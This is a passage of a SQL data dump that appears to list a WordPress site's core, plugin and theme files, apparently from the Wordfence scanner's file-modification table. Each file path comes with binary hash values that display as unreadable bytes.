6�JJ�7�+�','�+\"��Q���/N:�T$��\"���ȯ\r8v_3','',0,'?'),('�TY�PpE�w��','wp-includes/widgets/class-wp-widget-archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�POůJ�~�l�.�J','�o���`|?�0�5���q����_	!-+}Q�V-�','',0,'?'),('��4�����$ꎪ','wp-content/plugins/wordfence/views/scanner/scan-scheduling.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�i@�\\�`=�y�7\0','���-\020�[��5�B���c��^V�u8��k�','',0,'?'),('��q<�D>ܲ��6��','wp-includes/wp-includes/ms-functions.php',0,'�Q\n����[�|�J/�','�Q\n����[�|�J/�','�8f�٣�“��<}.Q��������','',0,'?'),('��\0�skk�Tu3So\\�','wp-content/plugins/wp-cerber/assets/flags/mw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/��a�D�o�=hs','4[����Պ\'6N���RP��15��}\Z��s�','',0,'?'),('�絛�zy���>_+�t','wp-includes/class-wp-user-meta-session-tokens.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8/\'\0�\0��vSL-G\0','����8�b�YB&?�6��o���>','',0,'?'),('��͜�ή{�&(t�ӫ','wp-includes/wp-includes/css/dist/editor/editor-styles.css',0,'�iۘ\"���뱠��','�iۘ\"���뱠��','���by:��8�3��o�\Z������\"ڹ�','',0,'?'),('���H�r #�w/�:4','wp-includes/js/dist/plugins.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l��bR<sr|�g>�','���g��f�jt�����4�H\'؞�W�\rR�~�','',0,'?'),('�,����U(�e�jR.XP','wp-content/plugins/wp-cerber/assets/flags/aq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�1\n�����x����','wp-includes/blocks/latest-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i{�$F�ČPի!','\Z:����F��s�K�����\\��W����\r��','',0,'?'),('�?��E_�)�xڅ$��','wp-admin/includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�#1���@伫֝k','y�\"pB�c�h��\0�PhD�Rd��\0bKO��','',0,'?'),('�P��g6�Q_Ĕ�','wp-content/themes/shootingstar/images/ajax-loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��TfY�@\0����N2','_?�&��_�g�R��%;�6�J䵤K�G','',0,'?'),('�d�To�f��ҷ�bS','wp-content/plugins/wordfence/lib/menu_dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1q��X}k8�','����\ZI(�b��ܚo��ߍ�9�\0�	ȅE2','',0,'?'),('�j��\nj<�c�@B�X','wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�q�טw�U��ͰR�','�JwYw�u�n��[���&D�FLV-�2L���','',0,'?'),('�po���X0%������','wp-includes/css/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b��d�(�*ț��K��','���$��l#��X#u��>�G�j�I;ߗ߮','',0,'?'),('�u;Ȍ0�q�w��=��','wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8q�X�n�_�tҐi�','Sb�O��m����/IQ>SĊW�ɖT�oV�+a','',0,'?'),('�P;_cv����Y`Ƈ','wp-includes/wp-includes/SimplePie/Item.php',0,'-ߟ��	�8����1�V','-ߟ��	�8����1�V','��Q`�m{�Ҹ\n�ք=��R#�Q����\0K�','',0,'?'),('�r��>�JR�Kk�j�','wp-includes/wp-includes/images/crystal/archive.png',0,'�S����I0An�','�S����I0An�','L��%X����O�+��Aa�!�S�\\܉�&���','',0,'?'),('�y�%@�}H��;,#','wp-includes/wp-includes/customize/class-wp-customize-header-image-setting.php',0,'y�$+��q?��U��','y�$+��q?��U��','�9@mr�ܵ��\"+B���V�K.�uB\"�����','',0,'?'),('�$c{�97^І�J�g','wp-includes/js/dist/server-side-render.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o#^�&jjG�MYI�','��+�v��G2-�g�\r��Q�-����UA�','',0,'?'),('��ŕ��oi|}��','wp-includes/block-supports/custom-classname.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ؚ�WiY�C��v�G','� #rCҗ�)�[�ȫ�R̞[���Q�\\�&��','',0,'?'),('�M�٦M�/`�','wp-includes/js/swfupload/handlers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*�#�0�-�Ճp�','H�#����a:��1������߯orrj�uz�zV','',0,'?'),('򱠭��B�R�z��Y','wp-includes/js/jquery/jquery.table-hotkeys.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�go����~i�I	�','�<��=���;�:�t_,w�ăI���,�,��','',0,'?'),('�?{o_���\'�n�','wp-admin/images/resize-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{3VV��FV�f�%K','懴y2q��Z�o��~��([��`\0`C�i\ZL\'','',0,'?'),('���_f $�O<o','wp-admin/js/common.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�ϋOny&��-���n',',�#�]�d���!�I|�4<�n�ނ�r\0,�','',0,'?'),('��LuZ;�@�Z���b�','wp-includes/wp-includes/ms-settings.php',0,'Ĉ�L�@�r#�}S���','Ĉ�L�@�r#�}S���','4n-���J���2����T�hߕ�!�_H/Z\"�','',0,'?'),('��%�\0��z�f�N�pS','wp-includes/js/tinymce/plugins/wpemoji/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SE���x=d��~���eM','\"�w�%%{���=L(���hK�\rƢH�P','',0,'?'),('��w�+\"+�$��^�','wp-content/plugins/wordfence/lib/wfLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WN ;ƶxv��/	�','K�PQn\"�_(�X/4S�䖏C�9�yA�K�L','',0,'?'),('��]�#{P�B�&{�Ƿ','wp-includes/wp-includes/js/wp-embed-template.js',0,'�lq3UN�:�9�:^E��','�lq3UN�:�9�:^E��','3R�X�o��}Q��P��b�������J��','',0,'?'),('��\Z�B V�݄�K��','wp-content/plugins/wp-cerber/assets/flags/gi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',����K]�0ȥR�','/��i�fh���r���Z(b��2�\Z�>˾�->','',0,'?'),('���cq6���Ǩ߮','wp-includes/wp-includes/js/dist/keyboard-shortcuts.min.js',0,'@J��x&H�*8�����.','@J��x&H�*8�����.','2�j��!^g^i�r3�P~�\0�K8�c��\n�','',0,'?'),('��֏�+=���#�Jn','wp-content/plugins/wp-cerber/assets/flags/wf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��iq*��@R��r�\n','}����A���xhI�z�T]�A�s�0;�y�E','',0,'?'),('�#\\���/�vXR','wp-admin/js/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~^_��\r}��V_�)x','�?l�;�t�F|t�9u�����.&{Y,A��','',0,'?'),('�Q��א�4����B|�','wp-includes/wp-includes/js/tinymce/skins/lightgray/img/anchor.gif',0,'��a5q��ȑ_4�@','��a5q��ȑ_4�@','(afo��x�D�paQ6�mtk�,���V^','',0,'?'),('�V�<��r\nQ�]jvXP','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/ProviderInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���*Nf�ټ{��','i��˶|1���v.4[�(�����m@f>��','',0,'?'),('�]��€Mp vP���','wp-content/plugins/wp-cerber/assets/flags/id.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o\'�!�*�HkV��\0��<','~\0`�v��o\\ETZ�eᜊ�z�eA�`�[HF�','',0,'?'),('�lF����c뒕�L���','wp-admin/js/iris.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�0!2�}�=��n��','�K��<<�6[��0�j�0��vg������J=�','',0,'?'),('��,�o�!�z�j\"�','wp-admin/css/edit.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Cqw=��*c�$[�','�6V�s4�s=T���,�ˇ4{w��m��z','',0,'?'),('�ؠ]�f���P��','wp-content/plugins/wordfence/lib/wfLockedOut.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vb�*���\nog�D�','�o����Ч���$E�71�8�K�I�E','',0,'?'),('�Qq^��&�\'����|�','wp-includes/wp-includes/widgets/class-wp-widget-tag-cloud.php',0,'��x̭&�b�+|eS�݂','��x̭&�b�+|eS�݂','�,��ɼ?��?�	p�f\0qO��_���&N9','',0,'?'),('�N�����s�','wp-includes/customize/class-wp-customize-custom-css-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^Tˮ,�\"A\n�3���',',���J�v�0�D�wB��t�fDD�H���Dgo','',0,'?'),('���w)�Ä��dž�','wp-content/plugins/wordfence/css/wordfenceBox.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���WY�~�H�#�]','�r����{��\ZI�5�O1���Q��Ӈ���C��','',0,'?'),('��S�A@=�Y���v','wp-content/plugins/wp-cerber/nexus/cerber-slave-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e��NG���:��l','hKu�)$�cU��o>��ᦐ���6�����','',0,'?'),('�����➞��^՘R�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o������h�g[','��߁.�-h4`9S _\r�)I�(��W��','',0,'?'),('�V��k9۴�s���ֿ','wp-admin/css/customize-controls-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʝ��\'��dwgZ�|�','b!��&f�a�u���Lqm<.�ќ3/X�c�[','',0,'?'),('���;�^𩸴8c�','wp-includes/css/buttons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[��\\���.�','Lێ��b����3���y����~�>�I�t���','',0,'?'),('�$i�6]}���+���','wp-content/plugins/wp-cerber/assets/flags/gd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(*Gkη����G֊�','�K���dh��JJ�q�yG|-<�r�	S[l��','',0,'?'),('�J\'#��rN�0a\r�','wp-includes/images/crystal/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nV�:�ω�G��-#k','�~B\Z-׼�of|W�x\\��|�M�)���ˢ','',0,'?'),('�Y��R�Yi/��l@HX�','wp-includes/js/media-grid.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�a\"��Å�\Z}n�K��','Zm��+�w��Ⱦ���d������2�D','',0,'?'),('��S��eT	�n\r','wp-content/themes/sg-window/img/icons/small/buzz.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m������lo/���','�J+�6�b�`�^��i���?��!E�DgE�S�F','',0,'?'),('􌙭3p�=�Ym�}�ۑ','wp-includes/wp-includes/default-filters.php',0,'���=��B/˥oH:z','���=��B/˥oH:z','G�$�������q��ԑZ}\n�F�TB�刔','',0,'?'),('�7:�b��\r,�ja�','wp-includes/js/dist/blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')TL��\\5�\0Rq`��','W��r�qlR!X;��G?��>F�Ň�����u�','',0,'?'),('�zZ�f���ip^�2׎','wp-includes/js/mediaelement/mediaelement.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a\0����\Z^2�-!]',' �+	M*a)N#kq�Dm]��{�=_b�?','',0,'?'),('�j�8���ď�\Z���','wp-includes/js/wp-backbone.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J��T	��l�Q��1','\nT��x��N�@��s_��L`�E*�d���H�c?','',0,'?'),('����O�i�l��%βf','wp-content/plugins/wp-cerber/assets/flags/gu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��ņ-�\0hH�Bs','��p,�a�L�|v��LY�*[���T�$+��','',0,'?'),('��(k��~E\0H\0�Cg','wp-includes/wp-includes/class-json.php',0,'kE\Z�[Z����䰱�','kE\Z�[Z����䰱�','�D����t��5��^	�σ�7�2��7�{','',0,'?'),('�棭s�� t�yg)�','wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305.php',0,'�@Bg�EJ�ƽH�','�@Bg�EJ�ƽH�','i��|\\I����E����_��X綈j��','',0,'?'),('��\0h�+�)m�D\nW;��','wp-content/plugins/wordfence/css/jquery-ui.theme.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�K�0�b��xљ]','4����\n�c�E2=V�{�+�\\goЅ�O��','',0,'?'),('�\0�d:c\Z6}����e','wp-includes/wp-includes/css/admin-bar.min.css',0,'L�7w��R��«���','L�7w��R��«���','9���\0*Ǔ��]S���J_>+=J�-�AoC','',0,'?'),('���]�R>�w.�EQ','wp-includes/sodium_compat/src/Core/Curve25519/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),('��:k^R�4�>A�g�','wp-includes/wp-includes/js/dist/autop.min.js',0,'��# 狌6�Qq<6','��# 狌6�Qq<6','\r39�5��.��c��Ⴅ�F�\"Ӄy^u�\0^','',0,'?'),('�!�֐(yJo*��J�','wp-content/plugins/wordfence/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�\\�BH+����)	','��84E�3I6-����9���!z��G�L�5','',0,'?'),('�)�#j�d��S���eʋ','wp-includes/js/jquery/ui/effect-shake.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;5�_������ƽ\"�','�$D���IAXF����wH�YO�J3�K��','',0,'?'),('�*�1�G鍫v�Lߟn�','wp-includes/sodium_compat/src/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I gƅ\Z:��۝�','|�N5ȩ*͟��h7j�.�x���}�ʗ����','',0,'?'),('�-\"D��ʹD�5a�/','wp-includes/cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�B�돗��QG�z','8�+\'p���|��ц�K��O�<�_e�-','',0,'?'),('�A4e���{�^����Z','wp-includes/js/wpdialog.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ʒy\n	� ep�ԩf','��!/�A��f�0=��G�7�h�/�uU�&g��','',0,'?'),('�F�l�������{|dZ�','wp-content/themes/shootingstar/docs/assets/blueprint-css/plugins/rtl/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<.�1�N Gҁ:V��QK','E��Ԃh�Z �z2=N\Zc�ŕ	�&���_��','',0,'?'),('�F��\Z����C��1�P','wp-content/plugins/wordfence/lib/wfDict.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y� L���Z!bE��l�','����.{0Je��{�5-���~[T�$Ğ','',0,'?'),('�p�������4���{','wp-content/plugins/wp-cerber/assets/flags/tj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��EK|��$1��(','5���J	�A��a�\\L�dz���4���~U�','',0,'?'),('�u�N���.A_�_�','wp-includes/js/media-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@4Va�ˣ������','���9�R����\r��Ʋo[�N�K��š*h��','',0,'?'),('������>+ܞL[�m','wp-includes/js/tinymce/skins/lightgray/img/anchor.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a5q��ȑ_4�@','(afo��x�D�paQ6�mtk�,���V^','',0,'?'),('���(��%�#�9yn','wp-admin/css/forms.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j\'�~?2��]�g�Z','�c<*WB!�,�5\ZTQEF�#��h_a�~�','',0,'?'),('��o��bBr�j3#\r��','wp-content/plugins/wordfence/waf/pomo/entry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';²iGQ���A���w','79]���#�/��r�bC�te\\c���ߏ��P','',0,'?'),('��D���6�S�/�cQ�?','wp-includes/customize/class-wp-customize-background-position-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�QJt\"��!!�_�^	','�릟�/Ԥ�o�kroQ���|E��Q�Z݁\ro','',0,'?'),('��{Z\n�0D\rO�M*Ut�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/GeoIp2Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N	�S�X�?z���','���Ԧ\n�ٲLK�Y���1�%�X7�~�*','',0,'?'),('����	�6��\r�l���','wp-content/plugins/wordfence/js/jquery.colorbox-min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y5�=��q��)����','H��4\\��v��/X�G��K����:gkl','',0,'?'),('����y��\0�\"��Q','wp-admin/user/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�V�����������','��m�\r�)��h0�E�C���N��`�D[	$3','',0,'?'),('��~������r�C��','wp-admin/link-parse-opml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����xa۔2���F','�%�vP|X��:�x�>�]|��y|��:���','',0,'?'),('�\r�B�Uҕ�H���v�','wp-includes/wp-includes/js/dist/block-directory.js',0,':-��q���?b׍�^�',':-��q���?b׍�^�','f2\"�c`��}�`��·����֑��ѕl�o','',0,'?'),('�j��Z�;\nlГ�','wp-includes/random_compat/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5&}k���!6�$�','X8�P���_9���kQ�a[��-mS\'<�@�!V:','',0,'?'),('�!,(?����#���','wp-content/plugins/wp-cerber/assets/flags/ck.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'[8A3��;�y��g�','��3{����;��ߍ2�Dh��}��(�†�','',0,'?'),('�$�ş a0����','wp-includes/wp-includes/class-walker-page-dropdown.php',0,'�tB�B2�[eJ��5�a','�tB�B2�[eJ��5�a','Y�Ds4��I<����A�t�ȃ���\Z��G���.','',0,'?'),('�\'�*��P��*5��o�','wp-includes/wp-includes/class-wp-rewrite.php',0,'�c���x�X��C��u%#','�c���x�X��C��u%#','ݐ/#N`j�R�1�t+��s�W�]�~S���mǗ','',0,'?'),('�6ҹtyԥGЁ��','wp-includes/wp-includes/css/editor-rtl.css',0,'b��d�(�*ț��K��','b��d�(�*ț��K��','���$��l#��X#u��>�G�j�I;ߗ߮','',0,'?'),('�:�u?͜PF��{S�M�','wp-content/plugins/wp-cerber/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�\n�.[�%�','\Zw<��>��s-��ӆd��@D�>f�\"�3','',0,'?'),('�KF\nO�i�},�w�','wp-includes/random_compat/byte_safe_strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[Bң�J�Ԉ�;',']�Q�˄=Pݵu�Q��{>ϐ���','',0,'?'),('�V9��K���goX��7�','wp-admin/images/align-left-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�8�O�����^��c','$kb�>�����k&�:	ڂa�7��Zcdm��%','',0,'?'),('�o�w1�k;ӗ`���','wp-includes/wp-includes/js/tw-sack.min.js',0,'�7�X��wO��qa','�7�X��wO��qa','k�\r<�I�-�Vsp�6gb4eb���fs�Ҹ��','',0,'?'),('�{m����5U3�Y����','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�.��(�K�pQ��','�ٍ$rb=p�h�x�K��5]8�Q���R��jn4','',0,'?'),('�����H�S!;� �','wp-admin/js/user-profile.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A���<�ِ�J��D��','�#�[�\Z*\n�L���=I�Dwguwd��,�\'�IE?�','',0,'?'),('���k��7l�lۄa�B','wp-includes/wp-includes/css/dist/format-library/style-rtl.css',0,'�6���F۔�\'�V��','�6���F۔�\'�V��','�h�}����]�ާ֚��$_8Znyi�E�4V����','',0,'?'),('��@�}�~�4G�v<�m','wp-includes/sodium_compat/src/Core32/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�b�f>���=���','����ߺ�`�\'���盱��Жx#i���#�','',0,'?'),('���+���q�pW��','wp-includes/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�瑥���\n��bk\0�q','��\n	�U����y���A��80CĆ���6$3','',0,'?'),('���qXr:�Hx�[','wp-content/plugins/wp-cerber/assets/flags/ad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\Z�3�	{��/_s_5�','j�~�+��E�A�9��M���\Z��e���c0T','',0,'?'),('���`�&X<�aQ�Vh\\','wp-admin/user/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x8��!���x�S�j','��J���f�v^�D�w�ۦ\n��s�Bu�/���L','',0,'?'),('��a����ЁC��Na','wp-content/themes/shootingstar/css/pie/PIE.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=\\��t��vw���z','���b�bx*a~ݒ�Tp�@v����{:@��','',0,'?'),('���Pq-�t�@l�','wp-includes/images/wlw/wp-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1	�ʚ�7w3K��*','5 ��}�x(��r�:a,zmK�H1|/��+��','',0,'?'),('���D0!24���4','wp-includes/wp-includes/js/wp-util.min.js',0,'�R�H��OZ\'�]1�T','�R�H��OZ\'�]1�T','���;@�O0,�KG#�&h0�RҘ�6�0���T','',0,'?'),('��gx�A�Ȣ}�g�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]ኮ���ȣ&','��K��#�@JU�}F�����,���![','',0,'?'),('� @�;��*�|��','wp-includes/Text/Diff/Engine/string.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':��=�M��\0��i)','����d��[�%�nZR��`������','',0,'?'),('�1t�v�3�9]AaC-','wp-content/plugins/wp-cerber/assets/flags/bs.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�t\Z���c��K�o�','_o	&�\'����&�Q�R���~E�1�d','',0,'?'),('�5ְ�%j$��,]�˦q','wp-content/themes/sg-window/inc/customize-sidebars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�؏����!�1','L\'!1ۧ1���و��db�f���9{U?�','',0,'?'),('�j��	-��cFo�k��','wp-includes/wp-includes/locale.php',0,'�Ʋ\04�)o�ybU^�','�Ʋ\04�)o�ybU^�','�<�6n�\'�J�����_��	�S%��GVJ','',0,'?'),('�x��\r���B��','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Fe.php',0,'�W�	��,��~�r�','�W�	��,��~�r�','L>���e������h�\rF$�C�V������7�','',0,'?'),('��]��p�R�/$�1�','wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M#Ƃ,�n���j9{��','��+��������N)¨�����L	K�z�(','',0,'?'),('���P��W2�.����','wp-includes/wp-includes/sodium_compat/LICENSE',0,'�x�6F�\0f����','�x�6F�\0f����','N��^q��yqܯ\r]�S��\\��[�C{V��y�w�','',0,'?'),('�����5��E�r','wp-content/plugins/wp-cerber/assets/flags/nr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*s�|�Ǯr�St��[','�bp%�a���,%M���q�^��4���$}�J','',0,'?'),('��_w�ƌ����','wp-includes/widgets/class-wp-widget-media-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}◷>y�O�G�','10*�u���ۤ��y[\\,�/��7��6�\r','',0,'?'),('�Ұ�^�(�L�Ǡ�ǝ�','wp-content/themes/sg-window/img/icons/aim.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�WU���6		��\'','B���v�,>yK�Cr�	U���=��\n�l�ft�%/','',0,'?'),('���q@�U���Q&�','wp-includes/wp-includes/images/smilies/mrgreen.png',0,'-5��^����J�j���','-5��^����J�j���','���M��g�$��+;��\0�5����H&\\E6%w','',0,'?'),('�-|V���H�%��','wp-admin/site-health.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�㚮�4�~�l��v-','0�co	觥���.����_A�T�\0^����)','',0,'?'),('��Ǣ�Bմ(�\\�0J','wp-includes/class-wp-text-diff-renderer-inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�l��_\r�u���','��פme�,��V����9�}����	y���v�','',0,'?'),('�(��u�L)����O','wp-content/plugins/wordfence/js/admin.ajaxWatcher.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_��7<�yf�\nb:ʄ','&O3w��Q��d�x�������@\n���m�?�$','',0,'?'),('�0:���6QUGA��k','wp-includes/wp-includes/class-wp-term-query.php',0,'Y\"������4XYt[','Y\"������4XYt[','��m⟮/�a�Ͳ(yMG.��dЪZ+����','',0,'?'),('�6N]bN��R������','wp-content/plugins/wordfence/vendor/geoip2/geoip2/.gitmodules',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڄ �q�?s1����U','�REkks&]!i�_����\"���y~����Ka�','',0,'?'),('�;�%N!9�\nL&N���','wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.Ke򩶂�\"/�w�','KwĿ���\Z˅�+CH�J\n\'��x ���M','',0,'?'),('�@���sB0<�{l�3��','wp-includes/wlwmanifest.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ԑ����i�^��','�ƤJľ**X|i���cy-�u6p�C-�$*\n�','',0,'?'),('�B��F=��Ğ�zj,','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-node-contains.js',0,'���w��%[U��3�','���w��%[U��3�','Et������z��fD:x?���o��c�ڋ	8P','',0,'?'),('�D=������S��C','wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�X�������`йKZ','S�W��,��f���K{��\\�������^Y/�','',0,'?'),('�N�p!ֽ��Dfw','wp-includes/wp-includes/images/smilies/icon_surprised.gif',0,'U��-��#+����0�?','U��-��#+����0�?','��cuy�X�ؓ�A��d�5[=w>�*S�pwe�._','',0,'?'),('�X7� ���j��]k^`','wp-includes/wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js',0,'QO1�/<�>%\"�X��','QO1�/<�>%\"�X��','�6�r�*�IY\0�C�9<��Jږ J*�xD','',0,'?'),('�k����e<F��4','wp-admin/js/revisions.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��\rӐn�� ����\Z','\roMQC�irtM�ҡ�����I����_','',0,'?'),('�}el����{Hd8g�','wp-includes/wp-includes/js/dist/edit-post.js',0,'Ե3<�Y5Ω8�z��;','Ե3<�Y5Ω8�z��;','�I&A ��k9H��xjW�;��JL�fS]z','',0,'?'),('���D��=K�49���','wp-includes/js/codemirror/codemirror.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�23j���1��(D��','��Ό�,a�u��@�s�Y%K���-o��n\r�','',0,'?'),('�������CMp<E��','wp-includes/class-wp-oembed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)�Q�\\�2%����','���`fO2��c���3/(�A̝T�tA�p','',0,'?'),('��M\\B�h����f[','wp-includes/wp-includes/general-template.php',0,'�lGfBp�X0=�aESy','�lGfBp�X0=�aESy','�qǼ<�x��Ӡ�A��X/rUCG�lW�\n*e','',0,'?'),('����쉹A�Ȝ�3\"g�','wp-includes/wp-includes/js/tinymce/plugins/wptextpattern/plugin.js',0,'E	��-N�o����','E	��-N�o����','�L�I‘�™Y�ow�)�4!:�;?��','',0,'?'),('��6K1���(��}/AX','wp-admin/network/user-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y���G-w���=�','|6���.�W��NScˆ��#��ޱ\0�2','',0,'?'),('�ߐ��~��`A/mh�F','wp-includes/wp-includes/default-constants.php',0,'����f\n��G8��','����f\n��G8��','��/�R�5ڍC,�i�K�f�}���\\4/\0��','',0,'?'),('��ĩ�}x�(T��','wp-includes/js/dist/block-library.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g9ޯ\0�\n.z�A�-','\'!P�\'��L�0�O\rh.\"����G��[�Z','',0,'?'),('���T`�p����<','wp-includes/wp-includes/load.php',0,'x8�7n�LH�g�gf�R','x8�7n�LH�g�gf�R','ŗْl5�������Xt�����C�\n�mA','',0,'?'),('�^Q6l��J!�	